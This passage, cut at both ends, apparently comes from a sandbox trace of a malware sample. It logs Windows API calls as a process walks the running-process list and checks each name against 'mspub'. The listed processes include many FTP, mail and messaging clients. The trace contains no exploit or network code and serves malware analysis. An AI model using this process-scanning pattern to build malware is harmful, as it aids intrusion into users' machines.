cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.363] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b730 [0097.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356b730, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0097.363] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0097.363] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="mspub") returned 0x0 [0097.363] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0097.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.364] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35792d8 [0097.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x35792d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0097.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0097.364] StrStrIA (lpFirst="powell_jane.exe", lpSrch="mspub") returned 0x0 [0097.364] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0097.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.366] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a9f8 [0097.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357a9f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0097.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0097.366] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="mspub") returned 0x0 [0097.366] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0097.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.367] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579308 [0097.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3579308, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0097.367] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0097.367] StrStrIA (lpFirst="gainedshape.exe", lpSrch="mspub") returned 0x0 [0097.367] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0097.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.368] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a898 [0097.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357a898, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0097.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0097.368] StrStrIA (lpFirst="opens-versions.exe", lpSrch="mspub") returned 0x0 [0097.368] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0097.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0097.369] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b370 [0097.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b370, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0097.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0097.369] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="mspub") returned 0x0 [0097.369] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.370] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579338 [0097.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579338, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.370] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0097.370] StrStrIA (lpFirst="3dftp.exe", lpSrch="mspub") returned 0x0 [0097.370] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.371] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ac78 [0097.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357ac78, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0097.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0097.371] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="mspub") returned 0x0 [0097.371] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.372] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579638 [0097.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579638, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0097.372] StrStrIA (lpFirst="alftp.exe", lpSrch="mspub") returned 0x0 [0097.372] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.373] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35796e0 [0097.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x35796e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0097.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0097.373] StrStrIA (lpFirst="barca.exe", lpSrch="mspub") returned 0x0 [0097.373] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.374] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579818 [0097.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3579818, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0097.374] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0097.374] StrStrIA (lpFirst="bitkinex.exe", lpSrch="mspub") returned 0x0 [0097.374] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.375] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579650 [0097.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579650, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0097.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0097.376] StrStrIA (lpFirst="coreftp.exe", lpSrch="mspub") returned 0x0 [0097.376] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.376] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574cd0 [0097.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574cd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0097.377] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0097.377] StrStrIA (lpFirst="far.exe", lpSrch="mspub") returned 0x0 [0097.377] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.380] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579830 [0097.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3579830, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0097.380] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0097.380] StrStrIA (lpFirst="filezilla.exe", lpSrch="mspub") returned 0x0 [0097.380] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.382] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579878 [0097.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3579878, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0097.382] StrStrIA (lpFirst="flashfxp.exe", lpSrch="mspub") returned 0x0 [0097.382] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.383] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579848 [0097.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3579848, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0097.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0097.383] StrStrIA (lpFirst="fling.exe", lpSrch="mspub") returned 0x0 [0097.383] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0097.384] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a9d8 [0097.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357a9d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0097.384] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0097.384] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="mspub") returned 0x0 [0097.385] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.385] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357abb8 [0097.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357abb8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0097.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0097.385] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="mspub") returned 0x0 [0097.386] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.386] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574ce0 [0097.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574ce0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0097.387] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0097.387] StrStrIA (lpFirst="icq.exe", lpSrch="mspub") returned 0x0 [0097.387] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.388] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35796f8 [0097.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35796f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0097.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0097.388] StrStrIA (lpFirst="leechftp.exe", lpSrch="mspub") returned 0x0 [0097.388] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.389] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579890 [0097.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3579890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0097.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0097.389] StrStrIA (lpFirst="ncftp.exe", lpSrch="mspub") returned 0x0 [0097.389] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.390] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579740 [0097.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3579740, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0097.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0097.390] StrStrIA (lpFirst="notepad.exe", lpSrch="mspub") returned 0x0 [0097.390] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.391] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35796c8 [0097.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x35796c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0097.391] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0097.391] StrStrIA (lpFirst="operamail.exe", lpSrch="mspub") returned 0x0 [0097.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 